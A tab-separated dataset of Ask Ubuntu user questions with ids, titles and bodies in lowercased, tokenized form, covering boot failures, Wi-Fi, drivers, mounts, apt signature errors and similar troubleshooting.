501977	ubuntu behaving very slowly : 2 hr boot time ( ata1 hard resetting link / device reported invalid chs sector 0 )	i have a fresh install of ubuntu 14.04 as a dual boot with windows 8.1 on my hp pavillion laptop . the windows 8 partition works fine ( i.e . boots quickly , performs well etc ) . the ubuntu partition is a complete pain . last night it took 2 hrs to boot . i 've included the boot log here . any suggestions as to how to interpret this would be much appreciated . some further background : the reason for the fresh install was that i broke my previous ubuntu 12.04 installation . i was hoping that a fresh installation , might solve the problem , but it has not . the looping error message is : [ 487.804406 ] ata1 : hard resetting link [ 488.912117 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 488.924198 ] ata1.00 : configured for udma/133 [ 488.924201 ] ata1.00 : retrying flush 0xea emask 0x4 [ 488.924268 ] ata1.00 : device reported invalid chs sector 0 [ 488.924280 ] ata1 : eh complete [ 536.860132 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen [ 536.860203 ] ata1.00 : failed command : flush cache ext [ 536.860254 ] ata1.00 : cmd ea/00:00:00:00:00/00:00:00:00:00/a0 tag 0 [ 536.860254 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x4 ( timeout ) [ 536.860368 ] ata1.00 : status : { drdy }
501979	program that edits a file through ssh	os : ubuntu 12.04 i was wondering if there are programs which let you edit a file on a remote server through ssh . basically what i 'm looking for is the following : there is a remote aix server that contains a certain file ( a perl script i.e . ) and i want to edit it from my native machine ( my ubuntu ) . is there a program which lets me edit the file ( by first giving the ip and password of the remote server ) and save the file on the server ? ofcourse i could just edit the file on the remote server , but i was wondering if there exists something like the nppftp plugin for notepad++ on windows . it does n't matter if it is terminal ( nano i.e . ) or gui . solution 1 : ssh -x user @ server gedit file.txt this does n't work because gedit is not installed on the remote server
501980	how can i set 'ulimit -r 95 ' for a non-root user in ubuntu ?	i need to set ulimit -r 95 for a non-root user . i edited : /etc/security/limits.conf /etc/pam.d/common-session /etc/pam.d/su according to this and this post . i.e . in limits.conf : [ myusername ] soft priority 95 [ myusername ] hard priority 95 and in /etc/pam.d/common-session and /etc/pam.d/su : session required pam_limits.so after a restart i still ca n't change the limit with : $ ulimit -r 95 bash : ulimit : real-time priority : can not modify limit : operation not permitted
501985	develop ubuntu device drivers	i am trying to write a simple device driver according to the book `` linux device drivers '' but ca n't set up the correct include path . i am using a simple make script . the operating system is ubuntu 14.04 lts with kernel 3.13.0-29-generic on an old intel ( pentium d ( emt/64 bit ) based pc . i 've tried : i/usr/src/include - > error ca n't find module.h ( there should be links but was n't there ) i/usr/src/linux-headers-3.13.0-29-generic/include and copied .config from /boot/ ... - > works for a while but ca n't find asm includes in the above include directory i found a directory named asm-generic so i made a link asm - > asm-generic . works again a little bit further until a file asm/thread_info.h is searched . found many of it in hardware dependent directory structure . before i mess up the whole system with setting up more links what is the correct way to set up the include path ?
501986	14.04 - black borders , black terminal	this question is clearly realted to this one . however , i tried the suggested approaches and neither of them worked . let me explain what happend : i 'm using an asus notebook with an integrated nvidia gpu . however , i 've only been using the intel graphics and it worked fine . i needed the nvidia driver for cuda , so i installed the matching driver from the nvidia website . afterwards , i could not log in ubuntu with a gui , but only in text mode . i then uninstalled all nvidia packages . however , i think that i broke something , because i have the same black boxes around all windows , as described in the referenced question .
501988	ubuntu desktop is flashing and does n't start anymore after reinstalling ubuntu-desktop ?	i need some help to fix this . today i 've decided to upgrade my ubuntu disto from 13.04 to 14.04 . i found this tutorial on the net - > http : //www.themukt.com/2014/06/17/upgrade-ubuntu-14-04-lts-previous-versions/ these are the steps described in the tutorial in order to upgrade to the 14.04 release : 1.change the ubuntu code name from raring ringtail to trusty tahr sudo sed -i 's/raring/trusty/g ' /etc/apt/sources.list 2 . disable third party ppas ( optional , see note ) cd /etc/apt/sources.list.d sudo rename 's/ ( . * ) / $ 1.bak/ ' * sudo find . -type f -name `` * '' -print | xargs sed -i 's/raring/trusty/g' 3 . update the repositories and upgrade sudo apt-get update & & sudo apt-get dist-upgrade 4 . reinstall ubuntu-desktop package sudo apt-get install -- reinstall ubuntu-desktop 5 . update grub and initramfs sudo update-grub & & sudo update-initramfs -u 6 . reboot your machine i have typed those commands from the command line , and what i obtained was this : - after i have reinstalled ubuntu-desktop ( step 4 ) the screen started flashing , so i thought it is normal and i should complete the other two steps in order to complete the upgrade , so i opened a tty shell and updated the grub and initramfs , then rebooted my system . - now when it boots , the screen is flashing again and after some time gets completely black ! what did i mess ? how can i resolve and recover the system ? it is the first time i am trying to make an upgrade on ubuntu , what could it be ? ? ? thanks for the attention .
501989	ubuntu 14.04 asus g550jk sonicmaster external subwoofer not working	i have bought asus g550jk laptop ( g version of n550 ) and installed ubuntu 14.04 on it . i 'm just a beginner in using ubuntu , but i managed to make everything work fine except the external sonicmaster subwoofer . there is no 2.1 option in sound settings , i think ubuntu does n't see the subwoofer . i tried many solutions , but i only managed to enable 2.1 settings with subwoofer , but when i check the sound i can only hear some noises from the laptop , not the subwoofer . i have added this at the end of the file : /etc/modprobe.d/alsa-base.conf options snd-hda-intel model=asus-mode4 but it does n't change anything . also , adding [ mapping analog-surround-21 ] device-strings = surround40 : % f channel-map = front-left , front-right , lfe , lfe paths-output = analog-output analog-output-speaker priority = 7 direction = output to the file : /usr/share/pulseaudio/alsa-mixer/profile-sets/extra-hdmi.conf does n't help . of course i changed the line in /etc/pulse/daemon.conf to enable-lfe-remixing = yes but all in all , it leads to nothing . i managed to enable 2.1 by adding the line : load-module module-combine channels=3 channel_map=front-left , front-right , lfe to the file : /etc/pulse/default.pa but , as i said , during the subwoofer check in sound settings i only heard some noises from the laptop . have you got any idea how to get it working ? thanks for any help . : )
501990	why skype installs only older version on ubuntu 12.04 ?	i installed skype and its working fine except that its an odl version and dont have option for video call at all . also tried to update but when it opens to install it offers to install older version . says `` an older version of skype is available in your normal software channels '' how to install new version of skype ? ? please help..
502000	i get an error when i start browser for execute php program in linux	i install xampp successfully in my ubuntu i start xampp problem : when i open localhost in my browser at time i get one error as shown in picture :
502001	installed ubuntu 14.04 lts alongside win 7 problems	i have installed ubuntu 14.04 lts successfully alongside win 7 but ubuntu is not booting up properly ! i get through the log in screen then desktop appears but i 'm unable to make any sort of input with the mouse or keyboard can you please let me know how to resolve this please thanks
502005	sync between two servers failing	i am back again with yet another question . introduction : ok so this time what i wanted to do is that i wanted to synchronize files in my ubuntu/smaba server to a local remote server . in my local server i have a folder shared called `` file '' and have given full permission to every one . on my ubuntu server i have the `` file '' mapped and i can read/write and delete file to and from it . whats going on : i have lucky backup installed to back up my ubuntu/samba files to a external usb drive . all the files are been backed up to the external drive with ease . problem : when i try to back up my local folders from ubuntu/samba server to the networked windows server through the mapped folder , only the folders get copied and not a single file . i have a error `` operation failed . file xx/xx/xx.doc not permitted '' what i have tried : i tried all possible combinations on lucky back up and even freesync software but both comes out with the same error . note : i saw in one post that i need to remove the time stamp of the folder/files , but since i am a newbee i do not know how to do that from these sw i am using ... . any help guys ?
502010	not resolving dns in virtualbox guest os	i 'm running ubuntu as a guest os in virtualbox within a windows 7 host . i can not access the internet from within the ubuntu vm . firefox just times out . in terminal i can ping external ip addresses such as 8.8.8.8 but attempting to ping web addresses just results in a timeout so this could be a dns issue . i 've spent a long time online trying to find other posts dealing with the same issue but i still have n't reached a resolution as some solutions just have n't worked and others involve doing things i do n't have the knowledge of linux to perform . some information : /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) , # do not edit this file ... , nameserver 127.0.1.1 ip addr 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up group default qlen 1000 link/ether 08:00:27:91:25:76 brd ff : ff : ff : ff : ff : ff inet 10.0.2.15/24 brd 10.0.2.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80 : :a00:27ff : fe91:2576/64 scope link valid_lft forever preferred_lft forever lspci | grep ethernet '' 00:03.0 ethernet controller : intel corporation 82540em gigabit ethernet controller ( rev 02 ) ''
502012	wifi access point in ubuntu 12.04	i know that this question had been asked several times on this site , but i could n't find answers for my problem . i want to create `` access point '' on my ubuntu 12.04-lts and share it with my android phone . i tried the methodes mentioned in these links but without success link1 and link2 here is what i have tried so far : i checked my wireless card capabilities with command iw list and the result contains `` ap '' . i tried the two methods mentioned above and they worked fine with me , but for the first time only . once i restart the computer , the script gives dnsmasq : failed to create listening socket for port 53 : address already in use [ fail ] when this error shows , my phone could see the access point but could n't acquire ip address from the dhcp server . then , i kill the dnsmasq and hostapd processes and restart the script . now , i can aquire an ip-address from the computer but could n't browse internet . i know that i have overlooked something , but i ca n't figure it out .
502014	error : gettext.mod not found	i have ubuntu 14.04 installed on my external hard drive and i used to boot it without any problem.but now there is an error saying : error : file '/boot/grub/i386-pc/gettext.mod ' not found . entering rescue mode ... grub rescue > _ the grub is also installed on my external drive . i wonder whether this is related to system update or not , because in my last successful boot session i tried system update.it froze in the middle of installing.i restarted ubuntu and after that i get the above error . i also booted ubuntu installation from a flash disk and tried to copy the file from try ubuntu option , but there is no such file there . thanks in advance , arman .
502016	how can i keep two external drives synced up ?	i have two external drives -- one is ntfs and one is ext4 . right now i am waiting for the contents of the slightly older ntfs drive to copy over to the ext4 drive . i 'll use these drives at different times ; ntfs for copying files from windows , and ext4 for copying from ubuntu , which means that the drives will have slightly different contents , but they 'll both be equally as important as one as another . there will be no master copy that can just overwrite the other . without simply using ubuntu to copy the drive contents across to the other drive every time i change something , how can i keep the two drives in sync ?
502017	tp-link tl-wdn3200 driver issue	i am using tp-link tl-wdn3200 wireless adapters in my linux ad-hoc network . two nodes could ping each other via the wdn3200 . but after a few hours idle running , one of the adapters went wrong . i got the following information after issuing dmesg | grep usb . x status read failed -71 [ 97.658913 ] ieee80211 phy1 : rt2800usb_tx_sta_fifo_read_completed : warning - tx status read failed -71 [ 97.663441 ] ieee80211 phy1 : rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x0500 with error -71 [ 97.667641 ] ieee80211 phy1 : rt2800usb_tx_sta_fifo_read_completed : warning - tx status read failed -71 does anyone know what error 71 means ? the wireless adapter is not listed by iwconfig and ifconfig . i ca n't see it using lshw -c network . i 've upgraded ubuntu 12.04 to 14.04 , the errors persist . i tested the wdn3200 adapters on windows , they work fine in both managed and ad-hoc modes . i think , there must be some problems with the linux driver ? i would be very grateful if anyone can provide a hint on how to solve such issues .
502018	how do you install m64py ?	if there was also a video tutorial , that would be great
502020	how to install a library when i have its source code ?	i want to include some libraries in my project like json-glib , beecrypt or libffi . usually , i install all the libraries using sudo apt-get install xyz . but sometimes , i get a .tar file of any library which i extract at some place on my desktop . i do n't know how to install these type of libraries for which i have the source code . i get the installed files in /usr/include or sometimes in /usr/lib folder when i install using the above command written . how to do it in case of source code ?
502021	upgrade from 11.10 to 12.04 - encrypted lvm disk	i decided to upgrade from 11.10 to 12.04 , but i have to consider that i use lvm with encrypted disks . i found a question about issues during upgrade here . it seems that i would be able to solve the issues , however i am not sure and i really do not want to spend a week to do upgrade without access to my data . my guess is that i can upgrade from alternative cd - 12.04.4 . my questions are : am i able to upgrade using the alternative cd ? ( my guess is that the installation process is able to identify that the computer already has a installation and suggests to upgrade . ) if i decide install from scratch , should i be able to keep my lvm untouched , at least /home ?
502025	change terminator title command	how to change temporarily the name of one of the subterminals in terminator from the command line of that specific subterminal ? i have tried for example this : echo -ne `` \033 ] 0 ; some title here\007 '' but without success
502028	firewire-core : bypassing the 1 second grace period	i am currently using the firewire cam avt guppy f080b and the iidc camera control library to store images whenever the camera is triggered . the application is not allowed to miss any trigger at any point and has to be able to run several days . my problem appears as soon something , e.g . other software , resets the bus . after detecting the reset , i try to start taking pictures again . then the library calls the read ( ) function to get new information from /dev/fw1 , but it blocks until this information is available . this takes up to one second und i lose up to 3 images ! as far as i understand , this blocking is due to the grace period of one second during which the firewire-core reallocates old connections , see e.g . here , line 1027 . is there a way to get around this ? especially since there are no firewire connections to be reallocated , i would rather just skip the reallocation part and completely remove the grace period . is this somehow possible ? another idea would be to reduce this period to say , 200 miliseconds , and recompile the module . how save would this be ?
502032	wired connection and ad-hoc wireless at the same time	i 'm setting up an ubuntu server 14.04 with a wired connection ( p4p1 ) and creating an ad-hoc wireless network . here 's my interfaces file : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto p4p1 iface p4p1 inet dhcp # wifi auto wlan0 iface wlan0 inet dhcp wireless-mode ad-hoc wireless-channel 4 wireless-essid augmented learning wireless-key 1234567890 address 192.168.0.2 netmask 255.255.255.0 broadcast 192.168.0.255 gateway 192.168.0.2 things are running smooth when one of the two interface is up , but when both are up , i can neither access internet ( via p4p1 ) nor access my ad-hoc network ( with wlan0 ) . what should i do to run them both at the same time ? i do n't need to share the connection . thanks ,
502035	ubuntu 13.10 ( 32bit ) on acer aspire one	has anyone ever tried ubuntu ( 32bit ) on an acer aspire one d255 2dqkk with 1gb of ram or 2gb ? at the moment i have 1gb installed and i would like to add 1gb more .
502037	eclipse windowbuilder on ubuntu not working	i can not get windowbuilder for eclipse to work on ubuntu no matter what . can someone who has done this ( gotten windowbuilder to work with eclipse on ubuntu ) please explain how you did it ? although , i obviously welcome input from anyone ! i have never installed windowbuilder on any other operating system so i could just be doing it wrong , but i think i followed the instructions pretty well . the version of eclipse that installs on ubuntu when you use the sudo apt-get install method ( or using the gui ubuntu software center interface ) is an older version then the current . i have tried installing windowsbuilder with both the old version of eclipse , as well as downloading the new version and trying that ( with the corresponding windowbuilder version of course ) . i always just get various errors and nothing works . does anyone have any idea ? eclipse works fine just not windowbuilder . i donât care which version , i just want it to work . summary of issues : i can not get windowbuilder for eclipse to work on ubuntu . i have tried both the older version of eclipse standard in ubuntu as well as the news version .
502038	how to convert the iso file into rar or zip or tar ?	is there anyway to extract iso or convert that to zip or rar or tar file ? actually i have a big iso file on my remote server so i just want a file from it not all of that , unfortunately i have not root access , so it 's my problem ...
502040	i 'm trying to do a sudo apt-get upgrade , but there are some packages that are no longer required . should i remove them ?	i 'm trying to upgrade my packages and there were some packages that were automatically installed and are no longer required . what should i do ? i 'm asked to use 'apt-get autoremove ' to remove them , but are they important ? will removing them break something on my system ? the following packages were automatically installed and are no longer required : linux-headers-3.13.0-24 linux-headers-3.13.0-24-generic linux-image-3.13.0-24-generic linux-image-extra-3.13.0-24-generic use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
502050	moving the hard disk to a new pc	i 've got an ubuntu server 12.04 installation on a desktop . i suspect something wrong with the motherboard . if i move the hard drive to a new box will there be any issues with drivers or is it expected to run readily ? thanks !
502051	ubuntu 14.04lts wi-fi hotspot is not detected by android phone	default creation of hotspot in network manager is not able to detected on andriod phones of any version . there is a answer for this question in given link below but its need to install third party repository link for an answer to this question ( but with 3rd party repository ) how can one make the ubuntu default setting of a hotspot creation to be detected on smartphones ?
502052	problem after apt-get update command	recently , i tried to install google earth from ubuntu tweak . the programme asked me to add the repository of google earth . well , after i do the command i found that an error message that told me that i could n't add the source and the system ca n't build packages tree.i run in terminal sudo apt-get update and i found following errors : fetched 143 kb in 3min 43s ( 637 b/s ) reading package lists ... error ! w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures were invalid : badsig 6af0e1940624a220 launchpad ppa for tualatrix w : gpg error : http : //eg.archive.ubuntu.com trusty-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/eg.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . i ca n't launch ubuntu software center.and a minus mark appear in bar at the top of the screen . please tell me what should i do in steps please.i have ubuntu 14.04 trusty tahr .
502054	vmplayer 6.0.3 crashes on kubuntu 14.04	since updating to kubuntu 14.04 vmplayer became unstable . i 'm getting constant crashes like this : *** error in `/usr/lib/vmware/bin/vmplayer ' : malloc ( ) : memory corruption : 0x00007fd306a36280 *** aborted ( core dumped ) there are many situation it happens , but the most robust way to reproduce is to try to open virtual mashine properties . crashes every time . interestingly when vm is running after crash it 's enough to play it again and it restores instantly ( meaning that the vm is still working , just display went down ) . anyone experienced it ? any solutions ? regards , mkl
502056	dual boot windows 8 and xubuntu on a macbook 11,1	i have a 13 '' retina macbook pro ( 11,1 ) and i 'm trying to figure out a dual boot setup with windows 8.1 and xubuntu ( osx is the only os i do n't need lol ) . i have windows 8.1 running , and when i go through the xubuntu install it does n't seem to see the windows installation . i proceeded because i was thinking that boot-repair would be able to figure it out . i manually partitioned the free space i left on the drive for linux , made sure that my /boot efi was using the correct partition that windows 8 had set up , but when i rebooted after finishing it hangs at the xubuntu splash screen . any thoughts ?
502057	how to run a phantomjs server with an upstart script ?	i have phantomjs installed and i want to run a phantom server whenever the ( ubuntu ) server starts . i am currently working locally on ubuntu 14.04 , and the server this will be deployed to is also ubuntu 14.04 . this is what i have so far : upstart script : # /etc/init/phantomjs.conf start on startup exec '/path/to/script/to/start/server.bash' bash script to start the phantom server : # /path/to/script/to/start/server.bash # ! /bin/bash phantomjs /path/to/the/server.js -host 127.0.0.1 -port 1337 when i run the server normally from the command line , it works as expected . when i run the upstart script , it ouputs ok , phantomjs is ready to the log file , but when i make post requests to it , nothing else happens . i would expect it to output something to the log each time i make a request , like it does when i run it from the command line , but it seems to just start the server and then nothing else .
502059	nuc dn2820fykh ubuntu 14.04 uefi	i have updated my bios to the latest version yesterday and since then the machine ca n't find bootable drive . i can boot using efi console , but it does n't play ball otherwise ! i tried boot-repair but that did n't fix the problem in the bios there are can see entries for the uefi but when you select it it does n't boot . just to clarify this machine has only ubuntu 14.04 in lvm partition ... no windows thanks in advance
502062	problem connecting xrdp	i am trying to connect to ubuntu 14.04 64 bit with microsoft remote desktop . i have xrdp installed . i am getting an error - problem connecting here is my xrdp.ini [ globals ] bitmap_cache=yes bitmap_compression=yes port=3389 crypt_level=low channel_code=1 max_bpp=24 [ xrdp1 ] name=sesman-xvnc lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=6333
502064	ubuntu 14.04 randomly freezes	i tried ubuntu and kubuntu but both are freezing on my desktop pc . i can still move my mouse pointer but nothing reacts . i ca n't even switch to tty . ( in comparison to the other freezing issues i found where the mouse pointer disappears but tty still works fine ) . it often occurs when i re-size or try to close a window ( i will be still there but frozen ) but not exclusively . using a intel quad core , 4gb ram and an amd radeon graphicscard . it 's no duplicate to the other recent freezing bugs i found on ask ubuntu ( at least if i didnât missed one ) since the behaviour of the freeze is different , i can sill move my mouse , but ca n't switch to tty . update i got to tty but wenn i type my login namethere for a while nothing happens then i get this message repeading every 10 secounds or so : ata3.00 : exeption emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen ata3.00 : failed command : read dma ext ata3.00 : cmd 'some hex numbers ' tag 'some number between 0 and 28 in this case ' dma 4096 in res 'some hex numbers ' emask 0x4 ( timeout ) ata3.00 : status : { drdy } and about every minute this message : end request : i/o error , dev sda , sector 'some huge number' buffer i/o error on sda1 , logical block 'some big number' pointing to harddrive problem , does n't it ?
502068	postfix - unable to connect to remote host : connection refused	i am running this command : telnet 87.106.xxx.xxx 25 and it says trying 87.106.xxx.xxx ... telnet : unable to connect to remote host : connection refused but telnet localhost is running properly . then i ran this command sudo netstat -plntu and it gave me : tcp 0 0 127.0.0.1:25 0.0.0.0 : * listen 9518/sendmail : mta : but the problem is i am not using sendmail . i am using postfix . i tried to uninstall sendmail with apt-get purge sendmail but it gives error : package sendmail is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any help will be really appreciated !
502069	asus x550 : unstable wireless connection	i 've been getting weak signal to my asus x550 laptop running ubuntu 14.04 . as suggested by someone in askubuntu.. i 've got a good signal but wifi keeps disconnecting automatically for every 5minutes or so . i 've ran this script and here is the link for the results http : //paste.ubuntu.com/7847358/ . please help .
502077	rendering problems with seiki 4 and sapphire hd 7770	i 've been trying to use a 39 '' seiki tv ( se39uy04 ) as a monitor -- running at 4k resolution . the video card is a sapphire hd 7770 . i 'm running ubuntu 14.04 . i 've been experiencing a lot of rendering problems with the video . the problems are both bad and slow rendering . the bad rendering looks like square areas of the screen are not being redrawn when the content on the screen changes ( especially when scrolling or switch between apps ) . this only seems to happen in web browsers ( chrome and firefox ) . the slow rendering happens more generally . scrolling around in my ide ( sublime text ) is painful . i was having problems when i was running 12.04lts as well , but the upgrades seems to have made them worse . the only advice i 've found online is to switch to the proprietary drives in the 'additional drivers ' tab of the software updater . i 've done that . what else should i do ? thanks edit : i 'm using xmonad , although it does n't work well in unity either .
502080	why is cifs mounting with sticky bit	i have a cifs mount that 's being mounted in fstab and looks like this : //192.168.1.97/media /home/pi/sambashare cifs credentials=/.credentials/.smbcredentials , rw , iocharset=utf8 , nounix , file_mode=0777 , dir_mode=0777 0 0 it works fine , with the exception that all of the folder permissions have the sticky bit on . i run a few programs as different users , so need to be able to have rw access to all the folders as different users , but the sticky bit is preventing me from making changes as the other users . have tried mounting with gid and uid also , but 1 ) user is always libuuid and group is always 1002 regardless of what gid and uid says and 2 ) i have different users that need access . any idea how to resolve this ?
502081	not able to run oracle sql developer ?	i stated the path directing to java 8 during first run of oracle sql developer.but it is not supporting it . so my question is how to change the javahome path to java 6 in sqldeveloper.config ? ?
502089	how do i list all options a filesystem is mounted with ?	both mount and cat /proc/mounts do not give me all the options i specified in the 'options ' field in /etc/fstab . for example , this is in my /etc/fstab : # < file system > < mount point > < type > < options > < dump > < pass > uuid=1afaad96-8aa3-4283-95a4-20510e5b3fbb / ext4 rw , async , exec , nouser , suid , errors=remount-ro 0 1 but the output of mount just gives me this ( mount -v doesnt work either ) : /dev/sda6 on / type ext4 ( rw ) and `cat /proc/mounts : rootfs / rootfs rw 0 0 so how can i check with what options my filesystems are mounted ?
502093	fetch fail on ppa	every time i run the update command i get the following message at the end of the update : w : failed to fetch http : //ppa.launchpad.net/deja-dup-team/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found how to i rectify this problem
502100	/usr/lib/pm-utils/power.d script not working	i 'm using ubuntu and trying to get pop-up notifications when power adapter removed . i placed my script at /usr/lib/pm-utils/power.d and made it executable , but the script seems not called when i removed the ac adaptor . the code i used for testing is this . what can possibly happening here ? # ! /bin/sh case $ 1 in false ) notify-send `` false '' ; ; true ) notify-send `` true '' ; ; esac above code is working fine when i invoked it in the following way ./test true
502105	how to installed ubuntu 12.04 lts alongside windows 7 ?	. i am using windows 7 64 bit and want to install ubuntu 12.04 lts alongside windows 7 please tell me how i can do that .
502106	ubuntu 13.04 all apt-get mirrors down	apparently i ca n't get apt-get , as well as the ubuntu software centre , connect to any repository . i also tried to look for a suitable mirror using the ubuntu software centre ( software sources- > ubuntu software- > download from- > other- > select best server ) , but it says it ca n't find any . my internet connection is ok ( i 'm writing here using the same pc on the same ubuntu ) , and there is no proxy . any ideas about what 's going on ?
502107	no build folder for older kernel module	i am on ubuntu 14.04 , but i need to run a linux kernel < = 3.8 in order to use a tool that is not compatible with more recent versions . i installed the linux headers and image from here , but i still do n't have a build folder in : /lib/modules/3.8.13-03081326-generic . how do i add it ?
502110	chown recursively changed permissions	i ran the chown command in a directory : chown -r user : user { . , } * the { . , } * is used with mv and cp to include both hidden and listed files . now this command went through and changed those two files in my directory , but i had to break it to stop since it went on . now i 'm afraid it has gone and changed the permissions on other files and folders , since it did n't terminate .
502115	sshfs you do not have the permissions necessary to view the contents of mounted directory	hello i am pretty new to using sshfs and i can view my mounted directory when i use root under the terminal . i do this by using sudo -i then i can navigate to my mounted directory and view my files , i want to be able to see them from the file system gui and access them without being root . when i go to my file explorer i do n't see my directory as a mounted directory , it simply looks like a binary file but it is not . i think this would work if i was root throughout the system without having to use sudo -i in the terminal . if anyone has any insight to this it would be greatly appreciated thanks .
502117	mg2200 series scangear mp ver . 2.00 for linux ( debian packagearchive ) last updated : 02-nov-2012	i got the following error messages issued while trying to install canon scangear . sudo dpkg -i scangearmp-mg2200series-2.00-1-deb dpkg-split : error : error reading scangearmp-mg2200series-2.00-1-deb : is a directory dpkg : error processing archive scangearmp-mg2200series-2.00-1-deb ( -- install ) : subprocess dpkg-split returned error exit status 2 errors were encountered while processing : scangearmp-mg2200series-2.00-1-deb jc @ jc-hp-pavilion-g7-notebook-pc : ~/scan $ ls scangearmp-mg2200series-2.00-1-deb scangearmp-mg2200series-2.00-1-deb.tar.gz any idea that might help ? thanks in advance for your cooperation .
502120	amazon aws type keys generation	there is perfect security model when connecting to amazon aws instance . but i would like to be able to make such key my self for custom user . to be clear it will be user with git repository , but it should not matter . could be nice if someone give reference to keys in general .
502121	how to set primary monitor with amd catalyst control center installed	when i run xrandr , i get a list of my connected monitors ( which are dfp5 and dfp6 ) dfp5 is an hdmi connected tv which i want to be my secondary monitor as it is smaller , and dfp6 is a dvi connected monitor which i want to be my primary monitor as it is the bigger of the two . however , when i run xrandr -- output dfp6 -- primary nothing happens , and the windows keep opening first of all on my smaller tv monitor . i have also edited my ~/.config/monitors.xml file and set the primary tag to yes for my big monitor , and no for my small tv monitor , and it has not made a difference . i have the amd catalyst control centre installed , and it is showing that my tv monitor is monitor 1 ( and therefore primary ) , but i do n't want it to be the primary , i want it to be secondary . if you can help me get this sorted , i would greatly appreciate it , thanks ! here 's a screenshot of amdcccle showing my monitor config . i want the monitor on the left to 1 , and the monitor on the right ( the tv monitor ) to be 2. http : //storage5.static.itmages.com/i/14/0724/h_1406217562_3506723_70676df955.png
502122	unique id for combination of latitude - longitude	i am new in using linux ( kubuntu 13 ) . i have a libreoffice calc table containing one column with latitude and one with longitude . what i want to do is for every unique combination of latitude and longitude a unique number to be assigned in a third column . by doing that every point represented by the ( lat/long ) will have a unique id number . how would i do this in bash shell ?
502123	file manager wo n't display folder contents within same window after upgrade to 14.04	i was using 12.04 . when using the file manager it used to display a widget/icon in the shape of an inverted triangle along side folders that you could click to open a folder to display its contents within the same window . i just upgraded to 14.04 and that widget/icon is gone , requiring the folder to be opened in a new window . the 12.04 version was very handy for moving and copying files within a single window . is there a way to get that widget/icon back ? do i have a faulty installation of the new `` files '' in 14.04 ? and if so , how do i reinstall it ?
502128	mysql accessing issues	i 've installed mysql-5.6.19 in my ubuntu 14.04 by downloading from mysql official website but after installing it i am not able to find where is the application & how can i start it & write queries into it .
502131	synaptic ppa repository error	i am using ubuntu 14.04 lts-64 on a hp pavilion dv7 laptop . yesterday i was adding a repository and when i did the `` sudo apt-get update '' i received this message : w : gpg error : http : //archive.canonical.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //extras.ubuntu.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : gpg error : http : //mirror.symnds.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //mirror.symnds.com trusty-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //mirror.symnds.com trusty-backports release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //mirror.symnds.com trusty-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 ====================================== i have tried the `` sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys `` , and it does nothing to fix the issue . i unticked all of my repositories , redid the update , same message . i rebooted , still not fixing the issue , ame message . when i did the `` sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys `` command this is what i got on saw on teh terminal : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 [ sudo ] password for brwright : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- homedir /tmp/tmp.xyr7arwerj -- no-auto-check-trustdb -- trust-model always -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyring /etc/apt/trusted.gpg.d/aking1012-com-lenstoggle.gpg -- keyring /etc/apt/trusted.gpg.d/alessandro-strada-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/alexx2000-doublecmd.gpg -- keyring /etc/apt/trusted.gpg.d/amith-ubuntutools.gpg -- keyring /etc/apt/trusted.gpg.d/antono-shelr.gpg -- keyring /etc/apt/trusted.gpg.d/appgrid-stable.gpg -- keyring /etc/apt/trusted.gpg.d/apt-fast-stable.gpg -- keyring /etc/apt/trusted.gpg.d/arctica0316-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/askubuntu-tools-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/atareao-atareao.gpg -- keyring /etc/apt/trusted.gpg.d/atareao-lenses.gpg -- keyring /etc/apt/trusted.gpg.d/atareao-nautilus-extensions.gpg -- keyring /etc/apt/trusted.gpg.d/banshee-team-banshee-daily.gpg -- keyring /etc/apt/trusted.gpg.d/banshee-team-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/bhdouglass-indicator-remindor.gpg -- keyring /etc/apt/trusted.gpg.d/bridge-daily.gpg -- keyring /etc/apt/trusted.gpg.d/caffeine-developers-ppa.gpg -- keyring 